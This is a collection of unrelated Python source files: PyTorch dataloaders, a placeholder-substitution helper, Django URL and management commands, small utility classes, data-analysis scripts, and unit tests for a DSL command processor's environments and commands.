        loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size,
                                             shuffle=True, num_workers=4, pin_memory=True, drop_last=True)
        return loader
    else:
        # NOTE(review): if args.type is none of jigsaw/rotate/image, ``dataset``
        # is unbound below and this raises UnboundLocalError.
        if args.type == 'jigsaw':
            img_transformer, tile_transformer = get_jig_train_transformers(args)
            dataset = JigsawDataset(name, 'train', img_transformer=img_transformer,
                                    tile_transformer=tile_transformer, jig_classes=args.aux_classes,
                                    bias_whole_image=args.bias_whole_image)
        elif args.type == 'rotate':
            img_transformer = get_train_transformers(args)
            dataset = RotateDataset(name, 'train', img_transformer=img_transformer,
                                    rot_classes=args.aux_classes, bias_whole_image=args.bias_whole_image, mode=mode)
        elif args.type == 'image':
            img_transformer = get_image_train_transformer(args)
            dataset = ImageDataset(name, 'train', img_transformer=img_transformer, mode=mode)
        loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size,
                                             shuffle=True, num_workers=4, pin_memory=True, drop_last=True)
        return loader
def get_test_dataloader(args):
    """Build test DataLoader(s) for dataset ``args.name``.

    Returns a single loader for FGADR/KaggleR or when multi_crop is off;
    otherwise returns a list with one loader per crop transformer.
    """
    name = args.name
    mode = args.get('mode', 'RGB')
    loaders = []
    if name == 'FGADR':
        img_trs = get_train_transformers_fgadr(args)
        val_dataset = FGADRTestDataset(name, split='test',
                                       img_transformer=img_trs, rot_classes=args.aux_classes, mode=mode)
        # dataset = ConcatDataset([val_dataset])
        loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle=False, num_workers=4,
                                             pin_memory=True, drop_last=False)
        return loader
    # if name == 'FGADR':
    #     for img_tr in img_trs:
    #         val_dataset = FGADRTestDataset(name, split='test',
    #                                        img_transformer=img_tr, rot_classes=args.aux_classes, mode=mode)
    #
    #         dataset = ConcatDataset([val_dataset])
    #         loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size, shuffle=False, num_workers=4,
    #                                              pin_memory=True, drop_last=False)
    #         if args.get('multi_crop', False):
    #             loaders.append(loader)
    #         else:
    #             return loader
    #
    #     return loaders
    elif name == 'KaggleR':
        img_trs = get_train_transformers_fgadr(args)
        val_dataset = KaggleRTestDataset(name, split='test',
                                         img_transformer=img_trs, rot_classes=args.aux_classes, mode=mode)
        # dataset = ConcatDataset([val_dataset])
        loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle=False, num_workers=4,
                                             pin_memory=True, drop_last=False)
        return loader
    # for img_tr in img_trs:
    #     val_dataset = KaggleRTestDataset(name, split='test',
    #                                      img_transformer=img_tr, rot_classes=args.aux_classes, mode=mode)
    #
    #     dataset = ConcatDataset([val_dataset])
    #     loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size, shuffle=False, num_workers=4,
    #                                          pin_memory=True, drop_last=False)
    #     if args.get('multi_crop', False):
    #         loaders.append(loader)
    #     else:
    #         return loader
    #
    #     return loaders
    else:
        # One loader per multi-crop transformer; returns after the first crop
        # unless multi_crop is set.
        img_trs = get_multi_crop_transformers(args)
        for img_tr in img_trs:
            if args.type == 'jigsaw':
                val_dataset = JigsawTestDataset(name, split='test',
                                                img_transformer=img_tr, jig_classes=args.aux_classes)
            elif args.type == 'rotate':
                val_dataset = RotateTestDataset(name, split='test',
                                                img_transformer=img_tr, rot_classes=args.aux_classes, mode=mode)
            elif args.type == 'image':
                val_dataset = ImageTestDataset(name, split='test',
                                               img_transformer=img_tr, mode=mode)
            if args.limit and len(val_dataset) > args.limit:
                val_dataset = Subset(val_dataset, args.limit)
                print("Using %d subset of dataset" % args.limit)
            dataset = ConcatDataset([val_dataset])
            loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size, shuffle=False, num_workers=4, pin_memory=True, drop_last=False)
            if args.get('multi_crop', False):
                loaders.append(loader)
            else:
                return loader
        return loaders
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
@Time : 2020/5/11 20:44
@Auth : 可优
@File : handle_parameterize.py
@IDE : PyCharm
@Motto: ABC(Always Be Coding)
@Email: keyou100@qq.com
@Company: 湖南省零檬信息技术有限公司
@Copyright: 柠檬班
-------------------------------------------------
"""
# 0、导入re模块
import re
# 1、创建全局数据池类
# 存储全局数据(三个用户账号、未注册的手机号等)
class GlobalData:
    """Process-wide data pool: placeholder values are attached as attributes
    named after the full "${name}" token (see Parameterize.to_parma)."""
    pass
# 2、定义原始字符串
# {"mobile_phone": "${not_existed_tel}", "pwd": "12345678", "type": 1, "reg_name": "KeYou"}
# {"mobile_phone": "18900001111", "pwd": "12345678", "type": 1, "reg_name": "KeYou"}
# one_str = '{"mobile_phone": "${not_existed_tel}", "pwd": "12345678", "type": 1, "reg_name": "KeYou"}'
# one_str = '{"mobile_phone": "${not_existed_tel}", "pwd": "12345678", "uid":" ${user_id}", "type": 1, "reg_name": "KeYou"}'
# 3、定义正则表达式
# a.findall方法将正则匹配上的值放在列表中返回
# b.第一个参数为正则表达式,需要在字符串前加r
# c.第二个参数为待匹配的字符串
# d.如果匹配不上,会返回空列表
# e.$有特殊含义,所以需要使用\来转义
# f. .*?可以匹配任意数据,为非贪婪模式进行匹配
# result = re.findall(r"\${.*?}", one_str)
# for item in result:
# data = getattr(GlobalData, item)
# one_str = one_str.replace(item, str(data))
class Parameterize:
    """Substitute "${name}" placeholders in a string with values stored on
    the GlobalData pool."""

    @staticmethod
    def to_parma(src):
        """Return *src* with every "${...}" token replaced by its pooled value."""
        # Non-greedy match collects each "${...}" token found in the string.
        placeholders = re.findall(r"\${.*?}", src)
        for placeholder in placeholders:
            # The attribute name on GlobalData is the full placeholder text.
            value = getattr(GlobalData, placeholder)
            # str.replace substitutes every occurrence of this placeholder
            # (re.sub would work equally well here).
            src = src.replace(placeholder, str(value))
        return src
if __name__ == '__main__':
    # one_str = '{"mobile_phone": "${not_existed_tel}", "pwd": "12345678", "uid":" ${user_id}", "type": 1, "reg_name": "KeYou"}'
    two_str = '{"mobile_phone": "${invest_user_tel}", "pwd": "12345678", "reg_name": "KeYou"}'
    # Register demo values on the global pool, keyed by the full "${name}" token.
    setattr(GlobalData, "${not_existed_tel}", "18911112222")
    setattr(GlobalData, "${user_id}", "3333")
    setattr(GlobalData, "${invest_user_tel}", "18911114444")
    # NOTE(review): the substituted result is discarded -- add a print to inspect it.
    Parameterize.to_parma(two_str)
    pass
|
from django.conf.urls import patterns, include, url
from django.conf import settings
from django.conf.urls.static import static
# Uncomment the next two lines to enable the admin:
#from django.contrib import admin
#admin.autodiscover()
import views
# Legacy Django (<1.10) URLconf using the deprecated patterns() helper;
# media files are served via static() during development.
urlpatterns = patterns('',
    url(r'^$', views.index, name='index'),
    url(r'^Viewer/', include('Viewer.urls',namespace="Viewer")),
    # url(r'^SUPERSTAR/', include('SUPERSTAR.urls',namespace="SUPERSTAR")),
    #url(r'^GLOOP/', include('GLOOP.urls',namespace="GLOOP")),
    url(r'^OOMMPPAA/', include('OOMMPPAA.urls',namespace="OOMMPPAA")),
    #url(r'^LLOOMMPPAA/', include('LLOOMMPPAA.urls',namespace="LLOOMMPPAA")),
    url(r'^WONKA/', include('WONKA.urls',namespace="WONKA")),
    # url(r'^admin/', include(admin.site.urls)),
    url( r'^upload/', views.upload, name = 'jfu_upload' ),
    url(r'^run/$', views.run, name='run'),
)+static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
from task_management.ticktick import util
from task_management.ticktick.entities.ticktick_task import TicktickTask
import json
class TicktickApi:
    """Thin wrapper over the TickTick Open API."""

    def task(self, context, params):
        '''Get tasks '''
        # The OAuth token travels in the request context headers.
        token = context["headers"]["access_token"]
        endpoint = "open/v1/project/{}/task/{}".format(
            params.get("project_id"), params.get("task_id"))
        payload = json.loads(util.rest("GET", endpoint, token).text)
        # Map the raw API payload onto the domain entity and expose it as a dict.
        result = TicktickTask(
            task_id=payload.get('id'),
            name=payload.get('title'),
            content=payload.get('content'),
            start_date=payload.get('startDate'),
            due_date=payload.get('dueDate'),
            priority=payload.get('priority'),
            timezone=payload.get('timeZone')
        )
        return result.__dict__
from MyCollections.LinkedList import LinkedList
class ListQueue:
    """FIFO queue backed by a singly linked list."""

    def __init__(self):
        self._data = LinkedList()

    def enqueue(self, value):
        """Append *value* at the back of the queue."""
        self._data.insertAtTail(value)

    def dequeue(self):
        """Remove and return the element at the front of the queue."""
        return self._data.pop_head()

    def is_empty(self):
        """Return True when the queue holds no elements."""
        return (self._data.size() == 0)

    def size(self):
        """Return the number of queued elements.

        BUG FIX: the original computed the size but never returned it,
        so size() always yielded None.
        """
        return self._data.size()
|
import json
class Settings():
    """Runtime configuration: camera location/credentials and API keys.

    __init__ reads config.json from the working directory;
    read_data_from_file() re-applies settings from an already-parsed dict.
    """

    # Keys copied verbatim from the config dict onto same-named attributes.
    _KEYS = ("coordinates", "hight", "azimut_ahgle_cam", "ip_camera",
             "login", "password", "key_google_maps")

    def __init__(self):
        with open("config.json", "r") as f:
            data = json.load(f)
        self._apply(data)
        # "port" is mandatory in the config file (as in the original).
        self.port = data["port"]

    def read_data_from_file(self, data):
        """Apply settings from *data* (a dict parsed elsewhere).

        FIX: the original silently skipped "port" here, leaving it stale
        after a reload; it is now updated when present (backward-compatible:
        a dict without "port" still works).
        """
        self._apply(data)
        if "port" in data:
            self.port = data["port"]

    def _apply(self, data):
        # Shared field-copy loop (removes the duplicated assignment blocks).
        for key in self._KEYS:
            setattr(self, key, data[key])
|
# -*- coding: utf-8 -*-
# @Author: mithril
from __future__ import unicode_literals, print_function, absolute_import
import pandas as pd
import json
from collections import Counter
# Characters that actually occur in the corpus (second column of the sheet).
df = pd.read_excel('CorpusCharacterlist.xls')
chars = set(df.iloc[:, [1]].values.flatten())
# Full character -> wubi-code mapping.
with open('wubi_all.json') as f:
    d = json.loads(f.read())
def build_unique_wubi(d, output):
    """Disambiguate duplicate wubi codes in *d* in place and dump it to *output*.

    The first entry holding a given code keeps it unchanged; each later
    duplicate gets an increasing numeric suffix ("abc", "abc1", "abc2", ...).
    Also prints the 10 most frequent codes.
    """
    c = Counter()
    for k, v in d.items():
        p = c.get(v, 0)  # how many entries already used code v
        c[v] += 1
        if p:
            d[k] += str(p)
    # FIX: close the output file deterministically -- the original used
    # open(output, 'w').write(...) and leaked the handle.
    with open(output, 'w') as fp:
        fp.write(json.dumps(d))
    print(c.most_common(10))
def build_usual_unique_wubi(d, output):
    """Restrict *d* (in place) to characters present in the corpus set ``chars``,
    then disambiguate duplicate codes via build_unique_wubi.

    Returns the pruned dict.
    """
    # BUG FIX: deleting keys while iterating d.keys() raises
    # "RuntimeError: dictionary changed size during iteration" on Python 3;
    # iterate over a snapshot of the keys instead.
    for k in list(d.keys()):
        if k not in chars:
            del d[k]
    build_unique_wubi(d, output)
    return d
# build_unique_wubi(d, 'wubi_unique_all.json')
if __name__ == '__main__':
    # from IPython.core import debugger
    # debugger.Pdb().set_trace()
    # NOTE(review): both calls mutate the same dict ``d`` in place, so the
    # second call sees codes already suffixed by the first -- confirm intended.
    build_unique_wubi(d, 'wubi_unique_all.json')
    build_usual_unique_wubi(d, 'wubi_unique_usual.json')
|
import logging
import os
import sys
from django.contrib.auth import get_user_model
from django.core.management.commands.test import Command as BaseCommand
import pandas
from core.models import Link
User = get_user_model()
logger = logging.getLogger(__name__)
def import_link(user: User, link: str):
    """Create and persist one Link row for *user*; log the outcome, never raise."""
    try:
        record = Link(original_link=link, user=user)
        record.save()
        # Best-effort import: a single bad row must not abort the whole run.
        logger.info(f'Successfully saved link="{link}" (id="{record.id}")')
    except Exception as ex:
        logger.error(f'Exception trying to save link="{link}": {ex}')
class Command(BaseCommand):
    """Management command: import links from a csv file into a user's account."""
    help = 'Populate Links from a csv'
    def add_arguments(self, parser):
        """Register the required --username and --csv-file-path options."""
        super().add_arguments(parser)
        parser.add_argument(
            '--username',
            dest='username',
            required=True,
            default=None,
            help='The username that will own imported links.',
        )
        parser.add_argument(
            '--csv-file-path',
            dest='csv_file_path',
            required=True,
            default=None,
            help=(
                'The full csv file path that contains links to be imported.'
            ),
        )
    def validate_user(self, username: str) -> User:
        """Return the User matching *username*, or print an error and exit(1)."""
        links_user = User.objects.filter(username=username).first()
        if not links_user:
            available_users = User.objects.values_list(
                'username', flat=True
            ).order_by('username')
            # NOTE(review): message typo -- "no use" should read "no user".
            message = f'There is no use with username={username}. '
            if len(available_users) > 0:
                message += f'Available users: {", ".join(available_users)}'
            else:
                message += (
                    'There are no available users, '
                    'at least one must be created manually.'
                )
            self.stdout.write(self.style.ERROR(message))
            sys.exit(1)
        return links_user
    def finish_if_csv_file_does_not_exist(self, path: str) -> bool:
        """Exit(1) with an error when *path* does not exist on the filesystem."""
        if not os.path.exists(path):
            message = f'There is not a file at filesystem path "{path}".'
            self.stdout.write(self.style.ERROR(message))
            sys.exit(1)
    def validate_existing_columns(self, dataframe):
        """Exit(1) unless the csv contains the mandatory 'link' column."""
        mandatory = {'link'}
        existing_columns = mandatory.intersection(set(dataframe.columns))
        if not existing_columns:
            message = f'Mandatory columns missing from file: {mandatory}'
            self.stdout.write(self.style.ERROR(message))
            sys.exit(1)
    def handle(self, *args, **options): # pylint: disable=unused-argument
        """
        To test manually:
            make local-links-csv-import-test
        """
        username = options.get('username')
        csv_file_path = options.get('csv_file_path')
        links_user = self.validate_user(username)
        self.finish_if_csv_file_does_not_exist(csv_file_path)
        self.stdout.write(
            f'Importing csv file "{csv_file_path}" '
            f'for username "{links_user.username}"... '
        )
        dataframe = pandas.read_csv(csv_file_path)
        self.validate_existing_columns(dataframe)
        # Each row's link is imported best-effort (failures are only logged).
        dataframe.link.apply(
            lambda value: import_link(link=value, user=links_user)
        )
|
import csv, sys
from robot import robot, check_command
# NOTE(review): Python 2 script (print statements).
print '#########################'
print '## Toy Robot Simulator ##'
print '######### IMPORT ########'
print '#########################'
print ''
print ''
# CSV file with a 'command' header column, passed as the first CLI argument.
filename = sys.argv[1]
commands = []
with open(filename) as csvfile:
    reader = csv.DictReader(csvfile)
    for row in reader:
        print row['command']
        # Only syntactically valid commands are queued for the robot.
        if(check_command(row['command'])):
            commands.append(row['command'])
        else:
            print 'Wrong command, try again'
print 'Output:'
robot(commands)
from __future__ import annotations
from prettyqt import constants, gui
class TextTableFormat(gui.textframeformat.TextFrameFormatMixin, gui.QTextTableFormat):
    """Pythonic wrapper around Qt's QTextTableFormat."""
    def __bool__(self):
        # A format is truthy iff Qt considers it valid.
        return self.isValid()
    def set_alignment(self, alignment: constants.AlignmentStr | constants.AlignmentFlag):
        """Set the alignment of the format.
        Args:
            alignment: alignment for the format
        """
        self.setAlignment(constants.ALIGNMENTS.get_enum_value(alignment))
    def get_alignment(self) -> constants.AlignmentStr:
        """Return current alignment.
        Returns:
            alignment
        """
        return constants.ALIGNMENTS.inverse[self.alignment()]
    def get_column_width_constraints(self) -> list[gui.TextLength]:
        """Return the table's column width constraints wrapped as gui.TextLength."""
        return [gui.TextLength(i) for i in self.columnWidthConstraints()]
if __name__ == "__main__":
    # Smoke test: construct a default table format and show its repr.
    fmt = TextTableFormat()
    print(fmt)
|
from __future__ import division, print_function
from matplotlib import pyplot as plt
import matplotlib
import seaborn as sns
import pandas as pd
import numpy as np
from utils.utils import get_commenters_dataframe, locaP, locaC, geod_world, geod_china
dataframe = get_commenters_dataframe()
def df_preprocess():
    """Derive 'province' and 'country' columns on the module-level dataframe."""
    # locaP maps free-text location to a province; misses become 'oversea'.
    dataframe['province'] = dataframe.location.apply(locaP)
    dataframe.province.fillna('oversea', inplace=True)
    # Country: last comma-separated token of the location, mapped via locaC;
    # unmapped values default to 'China'.
    dataframe['country'] = dataframe.location.apply(lambda x: x.split(sep=',')[-1].strip()) \
        .apply(locaC)
    dataframe.country.fillna('China', inplace=True)
def plot_follow():
    """Joint scatter of follower vs following counts; saves follow_analysis.jpg."""
    matplotlib.rc('figure', figsize=(14, 7))
    matplotlib.rc('font', size=14)
    matplotlib.rc('axes', grid=False)
    matplotlib.rc('axes', facecolor='white')
    sns.jointplot(x="follower_num", y="following_num", data=dataframe)
    plt.savefig('follow_analysis.jpg')
    plt.show()
def province_followers():
    """Print the top-10 provinces by average follower count per commenter."""
    temp = (dataframe.groupby(by='province').sum().follower_num / dataframe.province.value_counts()).sort_values(
        ascending=False).reset_index()
    print(temp.head(10))
def province_following():
    """Print the top-10 provinces by average following count per commenter."""
    temp = (dataframe.groupby(by='province').sum().following_num / dataframe.province.value_counts()).sort_values(
        ascending=False).reset_index()
    print(temp.head(10))
def commenter_country_analysis():
    """World map of commenter counts per country; saves commenter_country_analysis.jpg."""
    temp = dataframe.country.value_counts().reset_index()
    # log1p compresses the heavy skew; +10 keeps every country visible on the map.
    df = pd.DataFrame({'NAME': temp['index'].tolist(), 'NUM': (np.log1p(temp['country']) + 10).tolist()})
    geod_world(df, 'Where the brief comment comes from around world? ', )
    plt.savefig('commenter_country_analysis.jpg')
    plt.show()
    print(temp.head(10))
def commenter_province_analysis():
    """China map of commenter counts per province; saves commenter_province_analysis.jpg."""
    temp = dataframe.province.value_counts().reset_index()
    # log1p compresses the skew so populous provinces don't dominate the scale.
    df = pd.DataFrame({'NAME': temp['index'].tolist(), 'NUM': (np.log1p(temp['province'])).tolist()})
    geod_china(df, 'Where the brief comment comes from in China? ', legend=False)
    plt.savefig('commenter_province_analysis.jpg')
    plt.show()
    print(temp.head(10))
if __name__ == '__main__':
    # Only preprocessing runs by default; uncomment an analysis to plot it.
    df_preprocess()
    # plot_follow()
    # commenter_province_analysis()
    # commenter_country_analysis()
    # province_followers()
    # province_following()
|
# -*- coding: utf-8 -*-
#! \file ./tests/test_support/test_cmd/test_eval.py
#! \author Jiří Kučera, <sanczes@gmail.com>
#! \stamp 2016-04-18 18:07:39 (UTC+01:00, DST+01:00)
#! \project DoIt!: Tools and Libraries for Building DSLs
#! \license MIT
#! \version 0.0.0
#! \fdesc @pyfile.docstr
#
"""\
Command processor's eval module tests.\
"""
__license__ = """\
Copyright (c) 2014 - 2017 Jiří Kučera.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.\
"""
import unittest
from doit.support.cmd.errors import \
CommandProcessorError, \
CommandError
from doit.support.cmd.runtime import \
isderived, \
Location, \
Pair, \
List, \
HashMap, \
UserType, \
ExceptionClass, \
Procedure
from doit.support.cmd.eval import \
MetaInfo, \
Environment, \
CommandProcessor
from doit.support.cmd.commands import \
CommandContext, \
Initializer, \
Finalizer, \
Command, \
Lambda, \
Call, Return
class LoggingEnv(Environment):
    """Test environment whose wlog() appends messages to the owning
    processor's ``log`` list (see LoggingProcessor)."""
    __slots__ = []
    def __init__(self, processor = None, outer = None):
        Environment.__init__(self, processor, outer)
    #-def
    def wlog(self, processor, msg):
        # Requires a processor exposing a ``log`` list attribute.
        processor.log.append(msg)
    #-def
#-class
class LoggingProcessor(CommandProcessor):
    """CommandProcessor that collects messages written via LoggingEnv.wlog."""
    __slots__ = [ 'log' ]
    def __init__(self, env = None):
        CommandProcessor.__init__(self, env)
        # Messages appended here by LoggingEnv.wlog, in write order.
        self.log = []
    #-def
#-class
class TLoad(Command):
    """Test command: load variable *varname* from the current environment
    into the processor's accumulator."""
    __slots__ = [ 'varname' ]
    def __init__(self, varname):
        Command.__init__(self)
        self.varname = varname
    #-def
    def enter(self, processor, inlz):
        # Snapshot the environment and value-stack depth on entry.
        inlz.ctx.env = processor.getenv()
        inlz.ctx.nvals = processor.nvals()
        processor.pushctx(inlz.ctx)
    #-def
    def expand(self, processor):
        # Expansion sequence: Initializer -> do_load -> Finalizer.
        ctx = CommandContext(self)
        processor.insertcode(Initializer(ctx), self.do_load, Finalizer(ctx))
    #-def
    def do_load(self, processor):
        ctx = processor.cmdctx(self)
        processor.setacc(ctx.env.getvar(self.varname))
    #-def
    def leave(self, processor, fnlz):
        # Restore the value stack to its entry depth, then pop our context.
        while processor.nvals() > fnlz.ctx.nvals:
            processor.popval()
        processor.popctx(fnlz.ctx)
    #-def
#-class
class TStore(Command):
    """Test command: store the accumulator into variable `varname`."""
    __slots__ = [ 'varname' ]

    def __init__(self, varname):
        Command.__init__(self)
        self.varname = varname
    #-def

    def enter(self, processor, inlz):
        # Capture the environment and value-stack depth so leave() can restore.
        inlz.ctx.env = processor.getenv()
        inlz.ctx.nvals = processor.nvals()
        processor.pushctx(inlz.ctx)
    #-def

    def expand(self, processor):
        context = CommandContext(self)
        processor.insertcode(
            Initializer(context), self.do_store, Finalizer(context)
        )
    #-def

    def do_store(self, processor):
        processor.cmdctx(self).env.setvar(self.varname, processor.acc())
    #-def

    def leave(self, processor, fnlz):
        # Drop any values pushed since enter(), then pop our context.
        for _ in range(processor.nvals() - fnlz.ctx.nvals):
            processor.popval()
        processor.popctx(fnlz.ctx)
    #-def
#-class
class TBlock(Command):
    """Test command: run `cmds` inside a freshly created nested environment."""
    __slots__ = [ 'cmds' ]

    def __init__(self, cmds):
        Command.__init__(self)
        self.cmds = tuple(cmds)
    #-def

    def enter(self, processor, inlz):
        # A block opens a new scope chained to the current environment.
        inlz.ctx.env = processor.envclass()(processor, processor.getenv())
        inlz.ctx.nvals = processor.nvals()
        processor.pushctx(inlz.ctx)
    #-def

    def expand(self, processor):
        context = CommandContext(self)
        processor.insertcode(
            Initializer(context), *self.cmds, Finalizer(context)
        )
    #-def

    def leave(self, processor, fnlz):
        # Drop any values pushed since enter(), then pop our context.
        for _ in range(processor.nvals() - fnlz.ctx.nvals):
            processor.popval()
        processor.popctx(fnlz.ctx)
    #-def
#-class
class TLogBlock(TBlock):
    """TBlock that logs "<i>" on entry and "</i>" on exit.

    Used by test_cleanup to verify which finalizers actually ran.
    """
    __slots__ = [ 'i' ]
    def __init__(self, i, cmds):
        TBlock.__init__(self, cmds)
        # Numeric tag embedded in the log markers.
        self.i = i
    #-def
    def enter(self, processor, inlz):
        TBlock.enter(self, processor, inlz)
        inlz.ctx.env.wlog(processor, "<%d>" % self.i)
    #-def
    def leave(self, processor, fnlz):
        # The closing marker is written before the block scope is torn down.
        fnlz.ctx.env.wlog(processor, "</%d>" % self.i)
        TBlock.leave(self, processor, fnlz)
    #-def
#-class
class TSet(Command):
    """Test command: bind `varname` to the fixed `value` in the current scope."""
    __slots__ = [ 'varname', 'value' ]

    def __init__(self, varname, value):
        Command.__init__(self)
        self.varname = varname
        self.value = value
    #-def

    def enter(self, processor, inlz):
        # Capture the environment and value-stack depth so leave() can restore.
        inlz.ctx.env = processor.getenv()
        inlz.ctx.nvals = processor.nvals()
        processor.pushctx(inlz.ctx)
    #-def

    def expand(self, processor):
        context = CommandContext(self)
        processor.insertcode(
            Initializer(context), self.do_set, Finalizer(context)
        )
    #-def

    def do_set(self, processor):
        processor.cmdctx(self).env.setvar(self.varname, self.value)
    #-def

    def leave(self, processor, fnlz):
        # Drop any values pushed since enter(), then pop our context.
        for _ in range(processor.nvals() - fnlz.ctx.nvals):
            processor.popval()
        processor.popctx(fnlz.ctx)
    #-def
#-class
class TLoadEnv(Command):
    """Test command: place the current environment in the accumulator."""
    __slots__ = [ 'load_global' ]

    def __init__(self, load_global = False):
        Command.__init__(self)
        self.load_global = load_global
    #-def

    def enter(self, processor, inlz):
        # ctx.env stays None when the global environment was requested.
        inlz.ctx.env = None if self.load_global else processor.getenv()
        inlz.ctx.nvals = processor.nvals()
        processor.pushctx(inlz.ctx)
    #-def

    def expand(self, processor):
        context = CommandContext(self)
        processor.insertcode(
            Initializer(context), self.do_loadenv, Finalizer(context)
        )
    #-def

    def do_loadenv(self, processor):
        processor.setacc(processor.getenv())
    #-def

    def leave(self, processor, fnlz):
        # Drop any values pushed since enter(), then pop our context.
        for _ in range(processor.nvals() - fnlz.ctx.nvals):
            processor.popval()
        processor.popctx(fnlz.ctx)
    #-def
#-class
class TThrow(Command):
    """Test command: throw the exception class named `ename` with message `emsg`."""
    __slots__ = [ 'ename', 'emsg' ]
    def __init__(self, ename, emsg):
        Command.__init__(self)
        self.ename = ename
        self.emsg = emsg
    #-def
    def expand(self, processor):
        processor.insertcode(self.do_throw)
    #-def
    def do_throw(self, processor):
        # Resolve the name in the current environment; it must be an
        # ExceptionClass or throwing it is itself a TypeError.
        ecls = processor.getenv().getvar(self.ename)
        tb = processor.traceback()
        if not isinstance(ecls, ExceptionClass):
            raise CommandError(processor.TypeError,
                "Only exception objects can be throwed",
                tb
            )
        # Inserting a CommandError into the code stream raises it in-band.
        processor.insertcode(CommandError(ecls, self.emsg, tb))
    #-def
#-class
class TTryCatch(Command):
    """Test command: run `cmds`, dispatching errors to matching `handlers`.

    `handlers` is a sequence of (exception-name, variable-name, commands)
    triples; the first entry whose class covers the thrown error wins.
    """
    __slots__ = [ 'cmds', 'handlers' ]
    def __init__(self, cmds, handlers):
        Command.__init__(self)
        self.cmds = tuple(cmds)
        self.handlers = handlers
    #-def
    def enter(self, processor, inlz):
        # Capture the environment and value-stack depth so leave() can restore.
        inlz.ctx.env = processor.getenv()
        inlz.ctx.nvals = processor.nvals()
        processor.pushctx(inlz.ctx)
    #-def
    def expand(self, processor):
        ctx = CommandContext(self)
        processor.insertcode(
            *((Initializer(ctx),) + self.cmds + (Finalizer(ctx),))
        )
    #-def
    def leave(self, processor, fnlz):
        # Drop any values pushed since enter(), then pop our context.
        while processor.nvals() > fnlz.ctx.nvals:
            processor.popval()
        processor.popctx(fnlz.ctx)
    #-def
    def find_exception_handler(self, ctx, e):
        """Return the handler commands for `e`, None when no handler applies,
        or a one-element error list if the handler lookup itself failed."""
        try:
            # Only in-band CommandErrors carrying an ExceptionClass are
            # catchable; anything else propagates.
            if not (
                isinstance(e, CommandError)
                and isinstance(e.ecls, ExceptionClass)
            ):
                return None
            for name, vname, handler in self.handlers:
                ec = ctx.env.getvar(name)
                if isderived(e.ecls, ec):
                    # Optionally bind the error object for the handler body.
                    if vname:
                        ctx.env.setvar(vname, e)
                    return handler
            return None
        except CommandError as ce:
            # E.g. a handler's exception name is undefined in this scope.
            return [ce]
    #-def
#-class
class TestMetaInfoCase(unittest.TestCase):
    """Tests for MetaInfo equality semantics."""

    def test_equality(self):
        """Equality requires matching qname and location; non-MetaInfo never equals."""
        blank_a = MetaInfo()
        blank_b = MetaInfo()
        located = MetaInfo()
        located.qname = "x::y"
        located.location = Location("t", 1, 2)
        shifted = MetaInfo()
        shifted.qname = "x::y"
        shifted.location = Location("t", 1, 3)
        shifted_twin = MetaInfo()
        shifted_twin.qname = "x::y"
        shifted_twin.location = Location("t", 1, 3)
        # Two default-constructed infos compare equal.
        self.assertEqual(blank_a, blank_b)
        # A MetaInfo never equals a non-MetaInfo value.
        self.assertNotEqual(blank_a, 1)
        # Differing locations break equality.
        self.assertNotEqual(located, shifted)
        # Reflexivity, and equality of identical qname/location pairs.
        self.assertEqual(shifted, shifted)
        self.assertEqual(shifted, shifted_twin)
    #-def
#-class
class TestEnvironmentCase(unittest.TestCase):
    """Tests variable get/set/unset across chained environments.

    The original test repeated the same six-assertion scan after every
    mutation; the scan is now table-driven via _assert_bindings.
    """
    # Sentinel meaning "getvar must raise CommandError".
    _RAISES = object()

    def _assert_bindings(self, envs, expected):
        """Check each environment against its expected variable bindings.

        `envs` and `expected` run in parallel; each item of `expected`
        maps a variable name either to its expected value or to _RAISES.
        """
        for env, bindings in zip(envs, expected):
            for name, value in bindings.items():
                if value is self._RAISES:
                    with self.assertRaises(CommandError):
                        env.getvar(name)
                else:
                    self.assertEqual(env.getvar(name), value)
    #-def

    def test_vars(self):
        """Lookups resolve through the outer chain; unsetvar peels one layer."""
        E = self._RAISES
        p = CommandProcessor()
        e1 = Environment(p)
        e1.setvar('x', 42)
        e2 = Environment(outer = e1)
        e2.processor = p
        e2.setvar('x', 43)
        e2['y'] = 44
        self.assertIs(e2.outer(), e1)
        def check(s1, s2):
            self._assert_bindings((e1, e2), (s1, s2))
        check({'x': 42, 'y': E, 'z': E}, {'x': 43, 'y': 44, 'z': E})
        # Unsetting x in e2 exposes e1's binding; a second unset is a no-op.
        e2.unsetvar('x')
        check({'x': 42, 'y': E, 'z': E}, {'x': 42, 'y': 44, 'z': E})
        e2.unsetvar('x')
        check({'x': 42, 'y': E, 'z': E}, {'x': 42, 'y': 44, 'z': E})
        # Unsetting x in e1 removes it from both views; repeat is a no-op.
        e1.unsetvar('x')
        check({'x': E, 'y': E, 'z': E}, {'x': E, 'y': 44, 'z': E})
        e1.unsetvar('x')
        check({'x': E, 'y': E, 'z': E}, {'x': E, 'y': 44, 'z': E})
        # y lives only in e2, so unsetting it in e1 changes nothing.
        e1.unsetvar('y')
        check({'x': E, 'y': E, 'z': E}, {'x': E, 'y': 44, 'z': E})
        # Unsetting y in e2 removes the last binding; repeat is a no-op.
        e2.unsetvar('y')
        check({'x': E, 'y': E, 'z': E}, {'x': E, 'y': E, 'z': E})
        e2.unsetvar('y')
